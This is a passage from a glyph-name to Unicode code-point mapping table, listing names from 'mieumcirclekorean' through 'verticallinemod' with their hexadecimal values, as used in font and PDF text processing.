mieumcirclekorean;3264 mieumkorean;3141 mieumpansioskorean;3170 mieumparenkorean;3204 mieumpieupkorean;316E mieumsioskorean;316F mihiragana;307F mikatakana;30DF mikatakanahalfwidth;FF90 minus;2212 minusbelowcmb;0320 minuscircle;2296 minusmod;02D7 minusplus;2213 minute;2032 miribaarusquare;334A mirisquare;3349 mlonglegturned;0270 mlsquare;3396 mmcubedsquare;33A3 mmonospace;FF4D mmsquaredsquare;339F mohiragana;3082 mohmsquare;33C1 mokatakana;30E2 mokatakanahalfwidth;FF93 molsquare;33D6 momathai;0E21 moverssquare;33A7 moverssquaredsquare;33A8 mparen;24A8 mpasquare;33AB mssquare;33B3 msuperior;F6EF mturned;026F mu;00B5 mu1;00B5 muasquare;3382 muchgreater;226B muchless;226A mufsquare;338C mugreek;03BC mugsquare;338D muhiragana;3080 mukatakana;30E0 mukatakanahalfwidth;FF91 mulsquare;3395 multiply;00D7 mumsquare;339B munahhebrew;05A3 munahlefthebrew;05A3 musicalnote;266A musicalnotedbl;266B musicflatsign;266D musicsharpsign;266F mussquare;33B2 muvsquare;33B6 muwsquare;33BC mvmegasquare;33B9 mvsquare;33B7 mwmegasquare;33BF mwsquare;33BD n;006E nabengali;09A8 nabla;2207 nacute;0144 nadeva;0928 nagujarati;0AA8 nagurmukhi;0A28 nahiragana;306A nakatakana;30CA nakatakanahalfwidth;FF85 napostrophe;0149 nasquare;3381 nbopomofo;310B nbspace;00A0 ncaron;0148 ncedilla;0146 ncircle;24DD ncircumflexbelow;1E4B ncommaaccent;0146 ndotaccent;1E45 ndotbelow;1E47 nehiragana;306D nekatakana;30CD nekatakanahalfwidth;FF88 newsheqelsign;20AA nfsquare;338B ngabengali;0999 ngadeva;0919 ngagujarati;0A99 ngagurmukhi;0A19 ngonguthai;0E07 nhiragana;3093 nhookleft;0272 nhookretroflex;0273 nieunacirclekorean;326F nieunaparenkorean;320F nieuncieuckorean;3135 nieuncirclekorean;3261 nieunhieuhkorean;3136 nieunkorean;3134 nieunpansioskorean;3168 nieunparenkorean;3201 nieunsioskorean;3167 nieuntikeutkorean;3166 nihiragana;306B nikatakana;30CB nikatakanahalfwidth;FF86 nikhahitleftthai;F899 nikhahitthai;0E4D nine;0039 ninearabic;0669 ninebengali;09EF ninecircle;2468 ninecircleinversesansserif;2792 ninedeva;096F ninegujarati;0AEF ninegurmukhi;0A6F ninehackarabic;0669 ninehangzhou;3029 nineideographicparen;3228 nineinferior;2089 ninemonospace;FF19 nineoldstyle;F739 nineparen;247C nineperiod;2490 ninepersian;06F9 nineroman;2178 ninesuperior;2079 nineteencircle;2472 nineteenparen;2486 nineteenperiod;249A ninethai;0E59 nj;01CC njecyrillic;045A nkatakana;30F3 nkatakanahalfwidth;FF9D nlegrightlong;019E nlinebelow;1E49 nmonospace;FF4E nmsquare;339A nnabengali;09A3 nnadeva;0923 nnagujarati;0AA3 nnagurmukhi;0A23 nnnadeva;0929 nohiragana;306E nokatakana;30CE nokatakanahalfwidth;FF89 nonbreakingspace;00A0 nonenthai;0E13 nonuthai;0E19 noonarabic;0646 noonfinalarabic;FEE6 noonghunnaarabic;06BA noonghunnafinalarabic;FB9F noonhehinitialarabic;FEE7 FEEC nooninitialarabic;FEE7 noonjeeminitialarabic;FCD2 noonjeemisolatedarabic;FC4B noonmedialarabic;FEE8 noonmeeminitialarabic;FCD5 noonmeemisolatedarabic;FC4E noonnoonfinalarabic;FC8D notcontains;220C notelement;2209 notelementof;2209 notequal;2260 notgreater;226F notgreaternorequal;2271 notgreaternorless;2279 notidentical;2262 notless;226E notlessnorequal;2270 notparallel;2226 notprecedes;2280 notsubset;2284 notsucceeds;2281 notsuperset;2285 nowarmenian;0576 nparen;24A9 nssquare;33B1 nsuperior;207F ntilde;00F1 nu;03BD nuhiragana;306C nukatakana;30CC nukatakanahalfwidth;FF87 nuktabengali;09BC nuktadeva;093C nuktagujarati;0ABC nuktagurmukhi;0A3C numbersign;0023 numbersignmonospace;FF03 numbersignsmall;FE5F numeralsigngreek;0374 numeralsignlowergreek;0375 numero;2116 nun;05E0 nundagesh;FB40 nundageshhebrew;FB40 nunhebrew;05E0 nvsquare;33B5 nwsquare;33BB nyabengali;099E nyadeva;091E nyagujarati;0A9E nyagurmukhi;0A1E o;006F oacute;00F3 oangthai;0E2D obarred;0275 obarredcyrillic;04E9 obarreddieresiscyrillic;04EB obengali;0993 obopomofo;311B obreve;014F ocandradeva;0911 ocandragujarati;0A91 ocandravowelsigndeva;0949 ocandravowelsigngujarati;0AC9 ocaron;01D2 ocircle;24DE ocircumflex;00F4 ocircumflexacute;1ED1 ocircumflexdotbelow;1ED9 ocircumflexgrave;1ED3 ocircumflexhookabove;1ED5 ocircumflextilde;1ED7 ocyrillic;043E odblacute;0151 odblgrave;020D odeva;0913 odieresis;00F6 odieresiscyrillic;04E7 odotbelow;1ECD oe;0153 oekorean;315A ogonek;02DB ogonekcmb;0328 ograve;00F2 ogujarati;0A93 oharmenian;0585 ohiragana;304A ohookabove;1ECF ohorn;01A1 ohornacute;1EDB ohorndotbelow;1EE3 ohorngrave;1EDD ohornhookabove;1EDF ohorntilde;1EE1 ohungarumlaut;0151 oi;01A3 oinvertedbreve;020F okatakana;30AA okatakanahalfwidth;FF75 okorean;3157 olehebrew;05AB omacron;014D omacronacute;1E53 omacrongrave;1E51 omdeva;0950 omega;03C9 omega1;03D6 omegacyrillic;0461 omegalatinclosed;0277 omegaroundcyrillic;047B omegatitlocyrillic;047D omegatonos;03CE omgujarati;0AD0 omicron;03BF omicrontonos;03CC omonospace;FF4F one;0031 onearabic;0661 onebengali;09E7 onecircle;2460 onecircleinversesansserif;278A onedeva;0967 onedotenleader;2024 oneeighth;215B onefitted;F6DC onegujarati;0AE7 onegurmukhi;0A67 onehackarabic;0661 onehalf;00BD onehangzhou;3021 oneideographicparen;3220 oneinferior;2081 onemonospace;FF11 onenumeratorbengali;09F4 oneoldstyle;F731 oneparen;2474 oneperiod;2488 onepersian;06F1 onequarter;00BC oneroman;2170 onesuperior;00B9 onethai;0E51 onethird;2153 oogonek;01EB oogonekmacron;01ED oogurmukhi;0A13 oomatragurmukhi;0A4B oopen;0254 oparen;24AA openbullet;25E6 option;2325 ordfeminine;00AA ordmasculine;00BA orthogonal;221F oshortdeva;0912 oshortvowelsigndeva;094A oslash;00F8 oslashacute;01FF osmallhiragana;3049 osmallkatakana;30A9 osmallkatakanahalfwidth;FF6B ostrokeacute;01FF osuperior;F6F0 otcyrillic;047F otilde;00F5 otildeacute;1E4D otildedieresis;1E4F oubopomofo;3121 overline;203E overlinecenterline;FE4A overlinecmb;0305 overlinedashed;FE49 overlinedblwavy;FE4C overlinewavy;FE4B overscore;00AF ovowelsignbengali;09CB ovowelsigndeva;094B ovowelsigngujarati;0ACB p;0070 paampssquare;3380 paasentosquare;332B pabengali;09AA pacute;1E55 padeva;092A pagedown;21DF pageup;21DE pagujarati;0AAA pagurmukhi;0A2A pahiragana;3071 paiyannoithai;0E2F pakatakana;30D1 palatalizationcyrilliccmb;0484 palochkacyrillic;04C0 pansioskorean;317F paragraph;00B6 parallel;2225 parenleft;0028 parenleftaltonearabic;FD3E parenleftbt;F8ED parenleftex;F8EC parenleftinferior;208D parenleftmonospace;FF08 parenleftsmall;FE59 parenleftsuperior;207D parenlefttp;F8EB parenleftvertical;FE35 parenright;0029 parenrightaltonearabic;FD3F parenrightbt;F8F8 parenrightex;F8F7 parenrightinferior;208E parenrightmonospace;FF09 parenrightsmall;FE5A parenrightsuperior;207E parenrighttp;F8F6 parenrightvertical;FE36 partialdiff;2202 paseqhebrew;05C0 pashtahebrew;0599 pasquare;33A9 patah;05B7 patah11;05B7 patah1d;05B7 patah2a;05B7 patahhebrew;05B7 patahnarrowhebrew;05B7 patahquarterhebrew;05B7 patahwidehebrew;05B7 pazerhebrew;05A1 pbopomofo;3106 pcircle;24DF pdotaccent;1E57 pe;05E4 pecyrillic;043F pedagesh;FB44 pedageshhebrew;FB44 peezisquare;333B pefinaldageshhebrew;FB43 peharabic;067E peharmenian;057A pehebrew;05E4 pehfinalarabic;FB57 pehinitialarabic;FB58 pehiragana;307A pehmedialarabic;FB59 pekatakana;30DA pemiddlehookcyrillic;04A7 perafehebrew;FB4E percent;0025 percentarabic;066A percentmonospace;FF05 percentsmall;FE6A period;002E periodarmenian;0589 periodcentered;00B7 periodhalfwidth;FF61 periodinferior;F6E7 periodmonospace;FF0E periodsmall;FE52 periodsuperior;F6E8 perispomenigreekcmb;0342 perpendicular;22A5 perthousand;2030 peseta;20A7 pfsquare;338A phabengali;09AB phadeva;092B phagujarati;0AAB phagurmukhi;0A2B phi;03C6 phi1;03D5 phieuphacirclekorean;327A phieuphaparenkorean;321A phieuphcirclekorean;326C phieuphkorean;314D phieuphparenkorean;320C philatin;0278 phinthuthai;0E3A phisymbolgreek;03D5 phook;01A5 phophanthai;0E1E phophungthai;0E1C phosamphaothai;0E20 pi;03C0 pieupacirclekorean;3273 pieupaparenkorean;3213 pieupcieuckorean;3176 pieupcirclekorean;3265 pieupkiyeokkorean;3172 pieupkorean;3142 pieupparenkorean;3205 pieupsioskiyeokkorean;3174 pieupsioskorean;3144 pieupsiostikeutkorean;3175 pieupthieuthkorean;3177 pieuptikeutkorean;3173 pihiragana;3074 pikatakana;30D4 pisymbolgreek;03D6 piwrarmenian;0583 plus;002B plusbelowcmb;031F pluscircle;2295 plusminus;00B1 plusmod;02D6 plusmonospace;FF0B plussmall;FE62 plussuperior;207A pmonospace;FF50 pmsquare;33D8 pohiragana;307D pointingindexdownwhite;261F pointingindexleftwhite;261C pointingindexrightwhite;261E pointingindexupwhite;261D pokatakana;30DD poplathai;0E1B postalmark;3012 postalmarkface;3020 pparen;24AB precedes;227A prescription;211E primemod;02B9 primereversed;2035 product;220F projective;2305 prolongedkana;30FC propellor;2318 propersubset;2282 propersuperset;2283 proportion;2237 proportional;221D psi;03C8 psicyrillic;0471 psilipneumatacyrilliccmb;0486 pssquare;33B0 puhiragana;3077 pukatakana;30D7 pvsquare;33B4 pwsquare;33BA q;0071 qadeva;0958 qadmahebrew;05A8 qafarabic;0642 qaffinalarabic;FED6 qafinitialarabic;FED7 qafmedialarabic;FED8 qamats;05B8 qamats10;05B8 qamats1a;05B8 qamats1c;05B8 qamats27;05B8 qamats29;05B8 qamats33;05B8 qamatsde;05B8 qamatshebrew;05B8 qamatsnarrowhebrew;05B8 qamatsqatanhebrew;05B8 qamatsqatannarrowhebrew;05B8 qamatsqatanquarterhebrew;05B8 qamatsqatanwidehebrew;05B8 qamatsquarterhebrew;05B8 qamatswidehebrew;05B8 qarneyparahebrew;059F qbopomofo;3111 qcircle;24E0 qhook;02A0 qmonospace;FF51 qof;05E7 qofdagesh;FB47 qofdageshhebrew;FB47 qofhatafpatah;05E7 05B2 qofhatafpatahhebrew;05E7 05B2 qofhatafsegol;05E7 05B1 qofhatafsegolhebrew;05E7 05B1 qofhebrew;05E7 qofhiriq;05E7 05B4 qofhiriqhebrew;05E7 05B4 qofholam;05E7 05B9 qofholamhebrew;05E7 05B9 qofpatah;05E7 05B7 qofpatahhebrew;05E7 05B7 qofqamats;05E7 05B8 qofqamatshebrew;05E7 05B8 qofqubuts;05E7 05BB qofqubutshebrew;05E7 05BB qofsegol;05E7 05B6 qofsegolhebrew;05E7 05B6 qofsheva;05E7 05B0 qofshevahebrew;05E7 05B0 qoftsere;05E7 05B5 qoftserehebrew;05E7 05B5 qparen;24AC quarternote;2669 qubuts;05BB qubuts18;05BB qubuts25;05BB qubuts31;05BB qubutshebrew;05BB qubutsnarrowhebrew;05BB qubutsquarterhebrew;05BB qubutswidehebrew;05BB question;003F questionarabic;061F questionarmenian;055E questiondown;00BF questiondownsmall;F7BF questiongreek;037E questionmonospace;FF1F questionsmall;F73F quotedbl;0022 quotedblbase;201E quotedblleft;201C quotedblmonospace;FF02 quotedblprime;301E quotedblprimereversed;301D quotedblright;201D quoteleft;2018 quoteleftreversed;201B quotereversed;201B quoteright;2019 quoterightn;0149 quotesinglbase;201A quotesingle;0027 quotesinglemonospace;FF07 r;0072 raarmenian;057C rabengali;09B0 racute;0155 radeva;0930 radical;221A radicalex;F8E5 radoverssquare;33AE radoverssquaredsquare;33AF radsquare;33AD rafe;05BF rafehebrew;05BF ragujarati;0AB0 ragurmukhi;0A30 rahiragana;3089 rakatakana;30E9 rakatakanahalfwidth;FF97 ralowerdiagonalbengali;09F1 ramiddlediagonalbengali;09F0 ramshorn;0264 ratio;2236 rbopomofo;3116 rcaron;0159 rcedilla;0157 rcircle;24E1 rcommaaccent;0157 rdblgrave;0211 rdotaccent;1E59 rdotbelow;1E5B rdotbelowmacron;1E5D referencemark;203B reflexsubset;2286 reflexsuperset;2287 registered;00AE registersans;F8E8 registerserif;F6DA reharabic;0631 reharmenian;0580 rehfinalarabic;FEAE rehiragana;308C rehyehaleflamarabic;0631 FEF3 FE8E 0644 rekatakana;30EC rekatakanahalfwidth;FF9A resh;05E8 reshdageshhebrew;FB48 reshhatafpatah;05E8 05B2 reshhatafpatahhebrew;05E8 05B2 reshhatafsegol;05E8 05B1 reshhatafsegolhebrew;05E8 05B1 reshhebrew;05E8 reshhiriq;05E8 05B4 reshhiriqhebrew;05E8 05B4 reshholam;05E8 05B9 reshholamhebrew;05E8 05B9 reshpatah;05E8 05B7 reshpatahhebrew;05E8 05B7 reshqamats;05E8 05B8 reshqamatshebrew;05E8 05B8 reshqubuts;05E8 05BB reshqubutshebrew;05E8 05BB reshsegol;05E8 05B6 reshsegolhebrew;05E8 05B6 reshsheva;05E8 05B0 reshshevahebrew;05E8 05B0 reshtsere;05E8 05B5 reshtserehebrew;05E8 05B5 reversedtilde;223D reviahebrew;0597 reviamugrashhebrew;0597 revlogicalnot;2310 rfishhook;027E rfishhookreversed;027F rhabengali;09DD rhadeva;095D rho;03C1 rhook;027D rhookturned;027B rhookturnedsuperior;02B5 rhosymbolgreek;03F1 rhotichookmod;02DE rieulacirclekorean;3271 rieulaparenkorean;3211 rieulcirclekorean;3263 rieulhieuhkorean;3140 rieulkiyeokkorean;313A rieulkiyeoksioskorean;3169 rieulkorean;3139 rieulmieumkorean;313B rieulpansioskorean;316C rieulparenkorean;3203 rieulphieuphkorean;313F rieulpieupkorean;313C rieulpieupsioskorean;316B rieulsioskorean;313D rieulthieuthkorean;313E rieultikeutkorean;316A rieulyeorinhieuhkorean;316D rightangle;221F righttackbelowcmb;0319 righttriangle;22BF rihiragana;308A rikatakana;30EA rikatakanahalfwidth;FF98 ring;02DA ringbelowcmb;0325 ringcmb;030A ringhalfleft;02BF ringhalfleftarmenian;0559 ringhalfleftbelowcmb;031C ringhalfleftcentered;02D3 ringhalfright;02BE ringhalfrightbelowcmb;0339 ringhalfrightcentered;02D2 rinvertedbreve;0213 rittorusquare;3351 rlinebelow;1E5F rlongleg;027C rlonglegturned;027A rmonospace;FF52 rohiragana;308D rokatakana;30ED rokatakanahalfwidth;FF9B roruathai;0E23 rparen;24AD rrabengali;09DC rradeva;0931 rragurmukhi;0A5C rreharabic;0691 rrehfinalarabic;FB8D rrvocalicbengali;09E0 rrvocalicdeva;0960 rrvocalicgujarati;0AE0 rrvocalicvowelsignbengali;09C4 rrvocalicvowelsigndeva;0944 rrvocalicvowelsigngujarati;0AC4 rsuperior;F6F1 rtblock;2590 rturned;0279 rturnedsuperior;02B4 ruhiragana;308B rukatakana;30EB rukatakanahalfwidth;FF99 rupeemarkbengali;09F2 rupeesignbengali;09F3 rupiah;F6DD ruthai;0E24 rvocalicbengali;098B rvocalicdeva;090B rvocalicgujarati;0A8B rvocalicvowelsignbengali;09C3 rvocalicvowelsigndeva;0943 rvocalicvowelsigngujarati;0AC3 s;0073 sabengali;09B8 sacute;015B sacutedotaccent;1E65 sadarabic;0635 sadeva;0938 sadfinalarabic;FEBA sadinitialarabic;FEBB sadmedialarabic;FEBC sagujarati;0AB8 sagurmukhi;0A38 sahiragana;3055 sakatakana;30B5 sakatakanahalfwidth;FF7B sallallahoualayhewasallamarabic;FDFA samekh;05E1 samekhdagesh;FB41 samekhdageshhebrew;FB41 samekhhebrew;05E1 saraaathai;0E32 saraaethai;0E41 saraaimaimalaithai;0E44 saraaimaimuanthai;0E43 saraamthai;0E33 saraathai;0E30 saraethai;0E40 saraiileftthai;F886 saraiithai;0E35 saraileftthai;F885 saraithai;0E34 saraothai;0E42 saraueeleftthai;F888 saraueethai;0E37 saraueleftthai;F887 sarauethai;0E36 sarauthai;0E38 sarauuthai;0E39 sbopomofo;3119 scaron;0161 scarondotaccent;1E67 scedilla;015F schwa;0259 schwacyrillic;04D9 schwadieresiscyrillic;04DB schwahook;025A scircle;24E2 scircumflex;015D scommaaccent;0219 sdotaccent;1E61 sdotbelow;1E63 sdotbelowdotaccent;1E69 seagullbelowcmb;033C second;2033 secondtonechinese;02CA section;00A7 seenarabic;0633 seenfinalarabic;FEB2 seeninitialarabic;FEB3 seenmedialarabic;FEB4 segol;05B6 segol13;05B6 segol1f;05B6 segol2c;05B6 segolhebrew;05B6 segolnarrowhebrew;05B6 segolquarterhebrew;05B6 segoltahebrew;0592 segolwidehebrew;05B6 seharmenian;057D sehiragana;305B sekatakana;30BB sekatakanahalfwidth;FF7E semicolon;003B semicolonarabic;061B semicolonmonospace;FF1B semicolonsmall;FE54 semivoicedmarkkana;309C semivoicedmarkkanahalfwidth;FF9F sentisquare;3322 sentosquare;3323 seven;0037 sevenarabic;0667 sevenbengali;09ED sevencircle;2466 sevencircleinversesansserif;2790 sevendeva;096D seveneighths;215E sevengujarati;0AED sevengurmukhi;0A6D sevenhackarabic;0667 sevenhangzhou;3027 sevenideographicparen;3226 seveninferior;2087 sevenmonospace;FF17 sevenoldstyle;F737 sevenparen;247A sevenperiod;248E sevenpersian;06F7 sevenroman;2176 sevensuperior;2077 seventeencircle;2470 seventeenparen;2484 seventeenperiod;2498 seventhai;0E57 sfthyphen;00AD shaarmenian;0577 shabengali;09B6 shacyrillic;0448 shaddaarabic;0651 shaddadammaarabic;FC61 shaddadammatanarabic;FC5E shaddafathaarabic;FC60 shaddafathatanarabic;0651 064B shaddakasraarabic;FC62 shaddakasratanarabic;FC5F shade;2592 shadedark;2593 shadelight;2591 shademedium;2592 shadeva;0936 shagujarati;0AB6 shagurmukhi;0A36 shalshelethebrew;0593 shbopomofo;3115 shchacyrillic;0449 sheenarabic;0634 sheenfinalarabic;FEB6 sheeninitialarabic;FEB7 sheenmedialarabic;FEB8 sheicoptic;03E3 sheqel;20AA sheqelhebrew;20AA sheva;05B0 sheva115;05B0 sheva15;05B0 sheva22;05B0 sheva2e;05B0 shevahebrew;05B0 shevanarrowhebrew;05B0 shevaquarterhebrew;05B0 shevawidehebrew;05B0 shhacyrillic;04BB shimacoptic;03ED shin;05E9 shindagesh;FB49 shindageshhebrew;FB49 shindageshshindot;FB2C shindageshshindothebrew;FB2C shindageshsindot;FB2D shindageshsindothebrew;FB2D shindothebrew;05C1 shinhebrew;05E9 shinshindot;FB2A shinshindothebrew;FB2A shinsindot;FB2B shinsindothebrew;FB2B shook;0282 sigma;03C3 sigma1;03C2 sigmafinal;03C2 sigmalunatesymbolgreek;03F2 sihiragana;3057 sikatakana;30B7 sikatakanahalfwidth;FF7C siluqhebrew;05BD siluqlefthebrew;05BD similar;223C sindothebrew;05C2 siosacirclekorean;3274 siosaparenkorean;3214 sioscieuckorean;317E sioscirclekorean;3266 sioskiyeokkorean;317A sioskorean;3145 siosnieunkorean;317B siosparenkorean;3206 siospieupkorean;317D siostikeutkorean;317C six;0036 sixarabic;0666 sixbengali;09EC sixcircle;2465 sixcircleinversesansserif;278F sixdeva;096C sixgujarati;0AEC sixgurmukhi;0A6C sixhackarabic;0666 sixhangzhou;3026 sixideographicparen;3225 sixinferior;2086 sixmonospace;FF16 sixoldstyle;F736 sixparen;2479 sixperiod;248D sixpersian;06F6 sixroman;2175 sixsuperior;2076 sixteencircle;246F sixteencurrencydenominatorbengali;09F9 sixteenparen;2483 sixteenperiod;2497 sixthai;0E56 slash;002F slashmonospace;FF0F slong;017F slongdotaccent;1E9B smileface;263A smonospace;FF53 sofpasuqhebrew;05C3 softhyphen;00AD softsigncyrillic;044C sohiragana;305D sokatakana;30BD sokatakanahalfwidth;FF7F soliduslongoverlaycmb;0338 solidusshortoverlaycmb;0337 sorusithai;0E29 sosalathai;0E28 sosothai;0E0B sosuathai;0E2A space;0020 spacehackarabic;0020 spade;2660 spadesuitblack;2660 spadesuitwhite;2664 sparen;24AE squarebelowcmb;033B squarecc;33C4 squarecm;339D squarediagonalcrosshatchfill;25A9 squarehorizontalfill;25A4 squarekg;338F squarekm;339E squarekmcapital;33CE squareln;33D1 squarelog;33D2 squaremg;338E squaremil;33D5 squaremm;339C squaremsquared;33A1 squareorthogonalcrosshatchfill;25A6 squareupperlefttolowerrightfill;25A7 squareupperrighttolowerleftfill;25A8 squareverticalfill;25A5 squarewhitewithsmallblack;25A3 srsquare;33DB ssabengali;09B7 ssadeva;0937 ssagujarati;0AB7 ssangcieuckorean;3149 ssanghieuhkorean;3185 ssangieungkorean;3180 ssangkiyeokkorean;3132 ssangnieunkorean;3165 ssangpieupkorean;3143 ssangsioskorean;3146 ssangtikeutkorean;3138 ssuperior;F6F2 sterling;00A3 sterlingmonospace;FFE1 strokelongoverlaycmb;0336 strokeshortoverlaycmb;0335 subset;2282 subsetnotequal;228A subsetorequal;2286 succeeds;227B suchthat;220B suhiragana;3059 sukatakana;30B9 sukatakanahalfwidth;FF7D sukunarabic;0652 summation;2211 sun;263C superset;2283 supersetnotequal;228B supersetorequal;2287 svsquare;33DC syouwaerasquare;337C t;0074 tabengali;09A4 tackdown;22A4 tackleft;22A3 tadeva;0924 tagujarati;0AA4 tagurmukhi;0A24 taharabic;0637 tahfinalarabic;FEC2 tahinitialarabic;FEC3 tahiragana;305F tahmedialarabic;FEC4 taisyouerasquare;337D takatakana;30BF takatakanahalfwidth;FF80 tatweelarabic;0640 tau;03C4 tav;05EA tavdages;FB4A tavdagesh;FB4A tavdageshhebrew;FB4A tavhebrew;05EA tbar;0167 tbopomofo;310A tcaron;0165 tccurl;02A8 tcedilla;0163 tcheharabic;0686 tchehfinalarabic;FB7B tchehinitialarabic;FB7C tchehmedialarabic;FB7D tchehmeeminitialarabic;FB7C FEE4 tcircle;24E3 tcircumflexbelow;1E71 tcommaaccent;0163 tdieresis;1E97 tdotaccent;1E6B tdotbelow;1E6D tecyrillic;0442 tedescendercyrillic;04AD teharabic;062A tehfinalarabic;FE96 tehhahinitialarabic;FCA2 tehhahisolatedarabic;FC0C tehinitialarabic;FE97 tehiragana;3066 tehjeeminitialarabic;FCA1 tehjeemisolatedarabic;FC0B tehmarbutaarabic;0629 tehmarbutafinalarabic;FE94 tehmedialarabic;FE98 tehmeeminitialarabic;FCA4 tehmeemisolatedarabic;FC0E tehnoonfinalarabic;FC73 tekatakana;30C6 tekatakanahalfwidth;FF83 telephone;2121 telephoneblack;260E telishagedolahebrew;05A0 telishaqetanahebrew;05A9 tencircle;2469 tenideographicparen;3229 tenparen;247D tenperiod;2491 tenroman;2179 tesh;02A7 tet;05D8 tetdagesh;FB38 tetdageshhebrew;FB38 tethebrew;05D8 tetsecyrillic;04B5 tevirhebrew;059B tevirlefthebrew;059B thabengali;09A5 thadeva;0925 thagujarati;0AA5 thagurmukhi;0A25 thalarabic;0630 thalfinalarabic;FEAC thanthakhatlowleftthai;F898 thanthakhatlowrightthai;F897 thanthakhatthai;0E4C thanthakhatupperleftthai;F896 theharabic;062B thehfinalarabic;FE9A thehinitialarabic;FE9B thehmedialarabic;FE9C thereexists;2203 therefore;2234 theta;03B8 theta1;03D1 thetasymbolgreek;03D1 thieuthacirclekorean;3279 thieuthaparenkorean;3219 thieuthcirclekorean;326B thieuthkorean;314C thieuthparenkorean;320B thirteencircle;246C thirteenparen;2480 thirteenperiod;2494 thonangmonthothai;0E11 thook;01AD thophuthaothai;0E12 thorn;00FE thothahanthai;0E17 thothanthai;0E10 thothongthai;0E18 thothungthai;0E16 thousandcyrillic;0482 thousandsseparatorarabic;066C thousandsseparatorpersian;066C three;0033 threearabic;0663 threebengali;09E9 threecircle;2462 threecircleinversesansserif;278C threedeva;0969 threeeighths;215C threegujarati;0AE9 threegurmukhi;0A69 threehackarabic;0663 threehangzhou;3023 threeideographicparen;3222 threeinferior;2083 threemonospace;FF13 threenumeratorbengali;09F6 threeoldstyle;F733 threeparen;2476 threeperiod;248A threepersian;06F3 threequarters;00BE threequartersemdash;F6DE threeroman;2172 threesuperior;00B3 threethai;0E53 thzsquare;3394 tihiragana;3061 tikatakana;30C1 tikatakanahalfwidth;FF81 tikeutacirclekorean;3270 tikeutaparenkorean;3210 tikeutcirclekorean;3262 tikeutkorean;3137 tikeutparenkorean;3202 tilde;02DC tildebelowcmb;0330 tildecmb;0303 tildecomb;0303 tildedoublecmb;0360 tildeoperator;223C tildeoverlaycmb;0334 tildeverticalcmb;033E timescircle;2297 tipehahebrew;0596 tipehalefthebrew;0596 tippigurmukhi;0A70 titlocyrilliccmb;0483 tiwnarmenian;057F tlinebelow;1E6F tmonospace;FF54 toarmenian;0569 tohiragana;3068 tokatakana;30C8 tokatakanahalfwidth;FF84 tonebarextrahighmod;02E5 tonebarextralowmod;02E9 tonebarhighmod;02E6 tonebarlowmod;02E8 tonebarmidmod;02E7 tonefive;01BD tonesix;0185 tonetwo;01A8 tonos;0384 tonsquare;3327 topatakthai;0E0F tortoiseshellbracketleft;3014 tortoiseshellbracketleftsmall;FE5D tortoiseshellbracketleftvertical;FE39 tortoiseshellbracketright;3015 tortoiseshellbracketrightsmall;FE5E tortoiseshellbracketrightvertical;FE3A totaothai;0E15 tpalatalhook;01AB tparen;24AF trademark;2122 trademarksans;F8EA trademarkserif;F6DB tretroflexhook;0288 triagdn;25BC triaglf;25C4 triagrt;25BA triagup;25B2 ts;02A6 tsadi;05E6 tsadidagesh;FB46 tsadidageshhebrew;FB46 tsadihebrew;05E6 tsecyrillic;0446 tsere;05B5 tsere12;05B5 tsere1e;05B5 tsere2b;05B5 tserehebrew;05B5 tserenarrowhebrew;05B5 tserequarterhebrew;05B5 tserewidehebrew;05B5 tshecyrillic;045B tsuperior;F6F3 ttabengali;099F ttadeva;091F ttagujarati;0A9F ttagurmukhi;0A1F tteharabic;0679 ttehfinalarabic;FB67 ttehinitialarabic;FB68 ttehmedialarabic;FB69 tthabengali;09A0 tthadeva;0920 tthagujarati;0AA0 tthagurmukhi;0A20 tturned;0287 tuhiragana;3064 tukatakana;30C4 tukatakanahalfwidth;FF82 tusmallhiragana;3063 tusmallkatakana;30C3 tusmallkatakanahalfwidth;FF6F twelvecircle;246B twelveparen;247F twelveperiod;2493 twelveroman;217B twentycircle;2473 twentyhangzhou;5344 twentyparen;2487 twentyperiod;249B two;0032 twoarabic;0662 twobengali;09E8 twocircle;2461 twocircleinversesansserif;278B twodeva;0968 twodotenleader;2025 twodotleader;2025 twodotleadervertical;FE30 twogujarati;0AE8 twogurmukhi;0A68 twohackarabic;0662 twohangzhou;3022 twoideographicparen;3221 twoinferior;2082 twomonospace;FF12 twonumeratorbengali;09F5 twooldstyle;F732 twoparen;2475 twoperiod;2489 twopersian;06F2 tworoman;2171 twostroke;01BB twosuperior;00B2 twothai;0E52 twothirds;2154 u;0075 uacute;00FA ubar;0289 ubengali;0989 ubopomofo;3128 ubreve;016D ucaron;01D4 ucircle;24E4 ucircumflex;00FB ucircumflexbelow;1E77 ucyrillic;0443 udattadeva;0951 udblacute;0171 udblgrave;0215 udeva;0909 udieresis;00FC udieresisacute;01D8 udieresisbelow;1E73 udieresiscaron;01DA udieresiscyrillic;04F1 udieresisgrave;01DC udieresismacron;01D6 udotbelow;1EE5 ugrave;00F9 ugujarati;0A89 ugurmukhi;0A09 uhiragana;3046 uhookabove;1EE7 uhorn;01B0 uhornacute;1EE9 uhorndotbelow;1EF1 uhorngrave;1EEB uhornhookabove;1EED uhorntilde;1EEF uhungarumlaut;0171 uhungarumlautcyrillic;04F3 uinvertedbreve;0217 ukatakana;30A6 ukatakanahalfwidth;FF73 ukcyrillic;0479 ukorean;315C umacron;016B umacroncyrillic;04EF umacrondieresis;1E7B umatragurmukhi;0A41 umonospace;FF55 underscore;005F underscoredbl;2017 underscoremonospace;FF3F underscorevertical;FE33 underscorewavy;FE4F union;222A universal;2200 uogonek;0173 uparen;24B0 upblock;2580 upperdothebrew;05C4 upsilon;03C5 upsilondieresis;03CB upsilondieresistonos;03B0 upsilonlatin;028A upsilontonos;03CD uptackbelowcmb;031D uptackmod;02D4 uragurmukhi;0A73 uring;016F ushortcyrillic;045E usmallhiragana;3045 usmallkatakana;30A5 usmallkatakanahalfwidth;FF69 ustraightcyrillic;04AF ustraightstrokecyrillic;04B1 utilde;0169 utildeacute;1E79 utildebelow;1E75 uubengali;098A uudeva;090A uugujarati;0A8A uugurmukhi;0A0A uumatragurmukhi;0A42 uuvowelsignbengali;09C2 uuvowelsigndeva;0942 uuvowelsigngujarati;0AC2 uvowelsignbengali;09C1 uvowelsigndeva;0941 uvowelsigngujarati;0AC1 v;0076 vadeva;0935 vagujarati;0AB5 vagurmukhi;0A35 vakatakana;30F7 vav;05D5 vavdagesh;FB35 vavdagesh65;FB35 vavdageshhebrew;FB35 vavhebrew;05D5 vavholam;FB4B vavholamhebrew;FB4B vavvavhebrew;05F0 vavyodhebrew;05F1 vcircle;24E5 vdotbelow;1E7F vecyrillic;0432 veharabic;06A4 vehfinalarabic;FB6B vehinitialarabic;FB6C vehmedialarabic;FB6D vekatakana;30F9 venus;2640 verticalbar;007C verticallineabovecmb;030D verticallinebelowcmb;0329 verticallinelowmod;02CC verticallinemod;02C8 